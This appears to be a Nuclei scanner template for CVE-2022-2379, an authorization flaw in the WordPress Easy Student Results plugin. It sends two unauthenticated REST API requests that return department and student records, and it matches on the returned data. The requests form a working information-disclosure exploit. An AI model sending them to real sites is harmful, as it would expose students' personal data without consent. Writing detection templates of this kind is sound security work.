61 lines
1.7 KiB
YAML
61 lines
1.7 KiB
YAML
|
id: CVE-2022-2379
|
||
|
|
||
|
info:
|
||
|
name: WordPress Easy Student Results <=2.2.8 - Improper Authorization
|
||
|
author: theamanrawat
|
||
|
severity: high
|
||
|
description: |
|
||
|
WordPress Easy Student Results plugin through 2.2.8 is susceptible to information disclosure. The plugin lacks authorization in its REST API, which can allow an attacker to retrieve sensitive information related to courses, exams, and departments, as well as student grades and information such as email address, physical address, and phone number.
|
||
|
reference:
|
||
|
- https://wpscan.com/vulnerability/0773ba24-212e-41d5-9ae0-1416ea2c9db6
|
||
|
- https://wordpress.org/plugins/easy-student-results/
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-2379
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||
|
cvss-score: 7.5
|
||
|
cve-id: CVE-2022-2379
|
||
|
cwe-id: CWE-285
|
||
|
metadata:
|
||
|
verified: "true"
|
||
|
tags: wordpress,wp-plugin,wp,easy-student-results,disclosure,wpscan,cve,cve2022
|
||
|
|
||
|
http:
|
||
|
- raw:
|
||
|
- |
|
||
|
GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
|
||
|
- |
|
||
|
GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
|
||
|
stop-at-first-match: true
|
||
|
req-condition: true
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: body_1
|
||
|
words:
|
||
|
- '"departments":'
|
||
|
- 'batches":'
|
||
|
condition: and
|
||
|
|
||
|
- type: word
|
||
|
part: body_2
|
||
|
words:
|
||
|
- 'meta_data'
|
||
|
- '"name":"'
|
||
|
- '"registration_no":'
|
||
|
condition: and
|
||
|
|
||
|
- type: word
|
||
|
part: header
|
||
|
words:
|
||
|
- application/json
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
|
||
|
# Enhanced by cs on 2023/04/10
|